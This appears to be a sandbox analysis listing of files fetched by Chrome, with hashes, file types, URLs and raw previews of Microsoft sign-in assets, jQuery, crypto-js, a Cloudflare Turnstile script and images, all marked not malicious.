                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (47520)
                                                          Category:dropped
                                                          Size (bytes):47521
                                                          Entropy (8bit):5.3981340461317835
                                                          Encrypted:false
                                                          SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                          MD5:7C92EC9D1395055CE0405A32607C7291
                                                          SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                          SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                          SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):48316
                                                          Entropy (8bit):5.6346993394709
                                                          Encrypted:false
                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (47520)
                                                          Category:downloaded
                                                          Size (bytes):47521
                                                          Entropy (8bit):5.3981340461317835
                                                          Encrypted:false
                                                          SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                          MD5:7C92EC9D1395055CE0405A32607C7291
                                                          SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                          SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                          SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:downloaded
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                          Category:downloaded
                                                          Size (bytes):5525
                                                          Entropy (8bit):7.961202222662501
                                                          Encrypted:false
                                                          SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                          MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                          SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                          SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                          SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                          Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):96
                                                          Entropy (8bit):5.218997042938778
                                                          Encrypted:false
                                                          SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                          MD5:9872BE83FA60DA999B65A3BD481731D3
                                                          SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                          SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                          SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                          Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                          Category:dropped
                                                          Size (bytes):621
                                                          Entropy (8bit):7.673946009263606
                                                          Encrypted:false
                                                          SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                          MD5:4761405717E938D7E7400BB15715DB1E
                                                          SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                          SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                          SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:GIF image data, version 89a, 352 x 3
                                                          Category:dropped
                                                          Size (bytes):3620
                                                          Entropy (8bit):6.867828878374734
                                                          Encrypted:false
                                                          SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                          Category:dropped
                                                          Size (bytes):35170
                                                          Entropy (8bit):7.993096534744333
                                                          Encrypted:true
                                                          SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                          MD5:171A4DD9400708B88724B57D62B24A6A
                                                          SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                          SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                          SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                          Category:downloaded
                                                          Size (bytes):17174
                                                          Entropy (8bit):2.9129715116732746
                                                          Encrypted:false
                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                          Category:downloaded
                                                          Size (bytes):122725
                                                          Entropy (8bit):7.997347629519925
                                                          Encrypted:true
                                                          SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                          MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                          SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                          SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                          SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                          Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                          Category:dropped
                                                          Size (bytes):122725
                                                          Entropy (8bit):7.997347629519925
                                                          Encrypted:true
                                                          SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                          MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                          SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                          SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                          SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                          Category:downloaded
                                                          Size (bytes):673
                                                          Entropy (8bit):7.6596900876595075
                                                          Encrypted:false
                                                          SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                          MD5:0E176276362B94279A4492511BFCBD98
                                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:GIF image data, version 89a, 352 x 3
                                                          Category:dropped
                                                          Size (bytes):2672
                                                          Entropy (8bit):6.640973516071413
                                                          Encrypted:false
                                                          SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 22 x 5, 8-bit/color RGB, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):61
                                                          Entropy (8bit):4.068159130770307
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPlr6t/e0psyxl/k4E08up:6v/lhP8tW0pB7Tp
                                                          MD5:C9C3511D219B9B0D0AC6514624004DB2
                                                          SHA1:400B8EEFEB1175AC011C6DCD075F857D2FE35FCA
                                                          SHA-256:7B65DCBD6796E0CBE9D75EE94042FE8D0733D0E7AB7C61D760FED3756C89501B
                                                          SHA-512:3D998B267962301B47D109ADF5C0F602CCA1EF4BA72B77E01E1C9C439BA68E615FA2A40B3D27F43C5D33E6D1CD0EF39BA12B12884BD8529EC8B061CA3B0FAF29
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/902b4be51ba27c69/1737001055937/ICE5gX1v93RNlWk
                                                          Preview:.PNG........IHDR...............Y....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):61
